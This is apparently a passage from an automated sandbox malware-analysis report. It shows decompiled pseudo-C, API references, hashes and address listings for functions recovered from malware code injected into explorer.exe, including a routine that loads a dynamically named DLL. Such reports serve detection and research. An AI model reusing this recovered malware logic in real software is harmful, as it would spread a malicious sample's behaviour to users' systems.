                  0x0008ab3f
                  0x00000000
                  0x00000000
                  0x0008ab47
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 0008A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                  • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocateFreememset
                  • String ID: D
                  • API String ID: 2365139273-2746444292
                  • Opcode ID: 9c45f9d4e67f21cf4a9ce09d2943a26218555c80a6a1b7a13c3173b9ebd09dde
                  • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                  • Opcode Fuzzy Hash: 9c45f9d4e67f21cf4a9ce09d2943a26218555c80a6a1b7a13c3173b9ebd09dde
                  • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x293fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                  0x0008c4ce
                  0x0008c4ce
                  0x0008c4ce
                  0x0008c4d1
                  0x0008c4dd
                  0x0008c4e8
                  0x0008c504
                  0x0008c509
                  0x0008c512
                  0x0008c514
                  0x0008c51c
                  0x0008c53d
                  0x0008c542
                  0x0008c54f
                  0x0008c55a
                  0x0008c561
                  0x0008c568
                  0x0008c579
                  0x0008c57f
                  0x0008c582
                  0x0008c599
                  0x0008c5a5
                  0x0008c5ad
                  0x0008c5b4
                  0x0008c5ba
                  0x0008c5c6
                  0x0008c5cc
                  0x0008c5d3
                  0x0008c5e6
                  0x0008c5d5
                  0x0008c5d5
                  0x0008c5d8
                  0x0008c5de
                  0x0008c5e3
                  0x0008c5e8
                  0x0008c5f3
                  0x0008c605
                  0x0008c617
                  0x00000000
                  0x0008c619
                  0x0008c620
                  0x00000000
                  0x0008c626
                  0x0008c627
                  0x0008c627
                  0x0008c62e
                  0x0008c630
                  0x0008c635
                  0x0008c635
                  0x0008c63a
                  0x0008c63e
                  0x0008c63e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                  • Opcode Fuzzy Hash: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                  0x00092d76
                  0x00092d7b
                  0x00092d7f
                  0x00092d82
                  0x00092d82
                  0x00092d85
                  0x00092d8a
                  0x00092d8f
                  0x00092d92
                  0x00092d97
                  0x00092d9a
                  0x00092da0
                  0x00092da0
                  0x00092dab
                  0x00092dae
                  0x00092db5
                  0x00092dba
                  0x00000000
                  0x00000000
                  0x00092dc0
                  0x00092dc5
                  0x00092dc5
                  0x00092dca
                  0x00092dd0
                  0x00092dda
                  0x00092ddf
                  0x00092de5
                  0x00092e04
                  0x00092e07
                  0x00092e12
                  0x00092e12
                  0x00092e12
                  0x00092e09
                  0x00092e09
                  0x00092e0b
                  0x00000000
                  0x00092e0d
                  0x00092e0d
                  0x00092e0d
                  0x00092e0b
                  0x00092e1a
                  0x00092e1f
                  0x00092e24
                  0x00092e2a
                  0x00092e2e
                  0x00092e31
                  0x00092e34
                  0x00092e3a
                  0x00092e3f
                  0x00092e42
                  0x00092e48
                  0x00092e4d
                  0x00092e53
                  0x00092e59
                  0x00092e5e
                  0x00092e61
                  0x00092e66
                  0x00092e6a
                  0x00092e6e
                  0x00092e71
                  0x00092e74
                  0x00092e7d
                  0x00092e84
                  0x00092e87
                  0x00092e8a
                  0x00092e8f
                  0x00092e94
                  0x00092e97
                  0x00092e9a
                  0x00092e9a
                  0x00092e9e
                  0x00092ea7
                  0x00092eae
                  0x00092eb1
                  0x00092eb6
                  0x00092ebb
                  0x00092ebb
                  0x00092ebe
                  0x00092ec3
                  0x00000000
                  0x00000000
                  0x00092de7
                  0x00092de9
                  0x00092df6
                  0x00000000
                  0x00000000
                  0x00092df6
                  0x00092de9
                  0x00000000
                  0x00092de5
                  0x00092ec9
                  0x00092ece
                  0x00092ed1
                  0x00092ed4
                  0x00092f7f
                  0x00092f7f
                  0x00092eda
                  0x00092eda
                  0x00092eda
                  0x00092edf
                  0x00092f09
                  0x00092f0c
                  0x00092f0c
                  0x00092f11
                  0x00092f13
                  0x00092f15
                  0x00092f18
                  0x00092f1b
                  0x00092f23
                  0x00092f28
                  0x00092f28
                  0x00092f2e
                  0x00092f31
                  0x00092f34
                  0x00092f37
                  0x00092f39
                  0x00092f39
                  0x00092f3a
                  0x00092f3a
                  0x00092f37
                  0x00092f48
                  0x00092f4b
                  0x00092f4f
                  0x00092f54
                  0x00092f57
                  0x00092f5a
                  0x00092f5a
                  0x00092f5a
                  0x00092f5d
                  0x00092f5d
                  0x00092f60
                  0x00092f60
                  0x00092ee1
                  0x00092ee1
                  0x00092ef1
                  0x00092ef4
                  0x00092ef9
                  0x00092ef9
                  0x00092efc
                  0x00092eff
                  0x00092f02
                  0x00092f04
                  0x00092f04
                  0x00092f63
                  0x00092f65
                  0x00092f68
                  0x00092f68
                  0x00092f6e
                  0x00092f72
                  0x00092f75
                  0x00092f77
                  0x00092f77
                  0x00092f88
                  0x00092f8a
                  0x00092f8a
                  0x00092f92
                  0x00092fa0
                  0x00092fa3
                  0x00092fa5
                  0x00092fc5
                  0x00092fc5
                  0x00092fc8
                  0x00092fce
                  0x00092fcf
                  0x00092fd2
                  0x00092fd4
                  0x00092fd7
                  0x00092fda
                  0x00092fdd
                  0x00092fe1
                  0x00092fe4
                  0x00092fe7
                  0x00092fea
                  0x00092fec
                  0x00092fec
                  0x00092fef
                  0x00092ff1
                  0x00092ff1
                  0x00092ff4
                  0x00092ff6
                  0x00092ff9
                  0x00093001
                  0x00093004
                  0x00093009
                  0x00093009
                  0x0009300f
                  0x00093012
                  0x00093015
                  0x00093017
                  0x00093017
                  0x00093018
                  0x00093018
                  0x00093023
                  0x00093023
                  0x00093023
                  0x00093026
                  0x00093029
                  0x00093029
                  0x0009302c
                  0x0009302c
                  0x00092fef
                  0x0009302f
                  0x00093032
                  0x00093035
                  0x00093037
                  0x0009303a
                  0x0009303c
                  0x0009303f
                  0x00093042
                  0x00093044
                  0x00093047
                  0x0009304f
                  0x00093057
                  0x0009305a
                  0x0009305a
                  0x0009305a
                  0x0009305d
                  0x0009305d
                  0x0009305d
                  0x00093060
                  0x00093066
                  0x00093068
                  0x00093068
                  0x0009306e
                  0x00093074
                  0x0009307d
                  0x00093084
                  0x00093086
                  0x00093089
                  0x00093089
                  0x0009308c
                  0x0009308c
                  0x0009308f
                  0x00093091
                  0x00093094
                  0x00093096
                  0x000930b1
                  0x000930b1
                  0x000930b5
                  0x000930b8
                  0x000930bb
                  0x000930be
                  0x000930d4
                  0x000930d4
                  0x000930d4
                  0x000930c0
                  0x000930c0
                  0x000930c2
                  0x000930c6
                  0x000930c9
                  0x00000000
                  0x000930cb
                  0x000930cb
                  0x000930cd
                  0x00000000
                  0x000930cf
                  0x000930cf
                  0x000930cf
                  0x000930cd
                  0x000930c9
                  0x000930d8
                  0x000930db
                  0x000930e0
                  0x000930ea
                  0x000930ea
                  0x000930ea
                  0x000930ed
                  0x00093098
                  0x00093098
                  0x0009309a
                  0x000930a1
                  0x000930a1
                  0x000930a3
                  0x000930a5
                  0x000930a7
                  0x000930ab
                  0x000930ad
                  0x000930af
                  0x00000000
                  0x00000000
                  0x000930af
                  0x000930ab
                  0x0009309c
                  0x0009309c
                  0x0009309f
                  0x00000000
                  0x00000000
                  0x0009309f
                  0x0009309a
                  0x000930f7
                  0x000930f9
                  0x000930f9
                  0x00093104
                  0x00092fa7
                  0x00092fa7
                  0x00092faa
                  0x00000000
                  0x00092fac
                  0x00092fac
                  0x00092fae
                  0x00092fb2
                  0x00000000
                  0x00092fb4
                  0x00092fb4
                  0x00092fb4
                  0x00092fb7
                  0x00000000
                  0x00092fbb
                  0x00092fc4
                  0x00092fc4
                  0x00092fb7
                  0x00092fb2
                  0x00092faa
                  0x00092f96
                  0x00092f9f
                  0x00092f9f

                  APIs
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E0008B7A8(0x9b9c8,  &_v516) + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x9e680 = E0008E1BC(0x9b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x293fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x293fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x293f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
